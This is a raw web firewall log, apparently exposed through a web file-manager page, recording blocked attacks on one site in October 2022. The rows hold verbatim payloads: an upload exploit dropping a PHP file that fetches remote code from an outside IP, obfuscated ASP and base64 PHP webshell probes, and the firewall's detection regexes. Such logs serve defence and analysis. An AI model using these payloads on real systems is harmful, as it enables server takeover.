/
home
/
wwwlogs
/
free_waf_log
/
Upload File
HOME
["2022-10-02 19:39:53","103.20.63.107","POST","\/?c=utils&m=upload&formname=myform&editname=simg&uppath=static\/upfile&pn=","python-requests\/2.27.1","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/?c=utils&m=upload&formname=myform&editname=simg&uppath=static\/upfile&pn= HTTP\/1.1\nhost:www.boyaminge.com\ncontent-type:multipart\/form-data; boundary=34e8e9488648fce1692f29dcd25663bc\nconnection:keep-alive\naccept:*\/*\ncontent-length:699\nuser-agent:python-requests\/2.27.1\naccept-encoding:gzip, deflate\n\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"uppath\"\r\n\r\nstatic\/upfile\r\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"pn\"\r\n\r\n\r\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"editname\"\r\n\r\nsimg\r\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"Submit\"\r\n\r\n上传\r\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"formname\"\r\n\r\nmyform\r\n--34e8e9488648fce1692f29dcd25663bc\r\nContent-Disposition: form-data; name=\"file\"; filename=\"1.php\"\r\nContent-Type: image\/jpeg\r\n\r\nxxx1111xxx<?php copy\/**\/(\"http:\/\/103.20.63.156\/2.txt\",\"info.php\") ?>\r\n--34e8e9488648fce1692f29dcd25663bc--\r\n"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/7.asp","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> 1:Execute (\" Execute (\"\" :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&\"\"\"\")\"\"\"\"):Else:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&Mid(s,i+2,2)&\"\"\"\")\"\"\"\"):i=i+2:End If\"\"&chr(10)&\"\"Next:End Function:Response.Write(\"\"\"\"->|\"\"\"\"): Execute (\"\"\"\"On Error Resume Next:\"\"\"\"&bd(\"\"\"\"526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229\"\"\"\")):Response.Write(\"\"\"\"|<-\"\"\"\"):Response.End\"\")\")","POST \/7.asp HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:797\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/7.asp\n\n1=Execute (\" Execute (\"\" :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&\"\"\"\")\"\"\"\"):Else:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&Mid(s,i+2,2)&\"\"\"\")\"\"\"\"):i=i+2:End If\"\"&chr(10)&\"\"Next:End Function:Response.Write(\"\"\"\"->|\"\"\"\"): Execute (\"\"\"\"On Error Resume Next:\"\"\"\"&bd(\"\"\"\"526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229\"\"\"\")):Response.Write(\"\"\"\"|<-\"\"\"\"):Response.End\"\")\")"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/1e.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> t1:@ eval (base64_decode($_POST[z0]));","POST \/1e.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:344\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/1e.php\n\nt1=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/config\/admindes.asp","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> yuyu:Execute (\" Execute (\"\" :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&\"\"\"\")\"\"\"\"):Else:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&Mid(s,i+2,2)&\"\"\"\")\"\"\"\"):i=i+2:End If\"\"&chr(10)&\"\"Next:End Function:Response.Write(\"\"\"\"->|\"\"\"\"): Execute (\"\"\"\"On Error Resume Next:\"\"\"\"&bd(\"\"\"\"526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229\"\"\"\")):Response.Write(\"\"\"\"|<-\"\"\"\"):Response.End\"\")\")","POST \/config\/admindes.asp HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:800\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/config\/admindes.asp\n\nyuyu=Execute (\" Execute (\"\" :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&\"\"\"\")\"\"\"\"):Else:Execute(\"\"\"\"bd=bd&chr(&H\"\"\"\"&c&Mid(s,i+2,2)&\"\"\"\")\"\"\"\"):i=i+2:End If\"\"&chr(10)&\"\"Next:End Function:Response.Write(\"\"\"\"->|\"\"\"\"): Execute (\"\"\"\"On Error Resume Next:\"\"\"\"&bd(\"\"\"\"526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229\"\"\"\")):Response.Write(\"\"\"\"|<-\"\"\"\"):Response.End\"\")\")"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/huon.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> roce:@ eval (base64_decode($_POST[z0]));","POST \/huon.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:346\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/huon.php\n\nroce=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/dk2.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> whoami:@ eval (base64_decode($_POST[z0]));","POST \/dk2.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:348\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/dk2.php\n\nwhoami=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/kwyuj.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> ysy:@ eval (base64_decode($_POST[z0]));","POST \/kwyuj.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:345\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/kwyuj.php\n\nysy=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/xq.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> q:@ eval (base64_decode($_POST[z0]));","POST \/xq.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:343\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/xq.php\n\nq=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"] ["2022-10-02 21:47:34","47.106.162.94","POST","\/xq.php","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","60秒以内累计超过6次以上非法请求,封锁180秒","POST \/xq.php HTTP\/1.1\nhost:boyaminge.com\naccept-language:zh-cn\ncontent-type:application\/x-www-form-urlencoded\nconnection:Keep-Alive\naccept:*\/*\ncontent-length:343\nuser-agent:Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\nreferer:http:\/\/boyaminge.com\/xq.php\n\nq=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7"]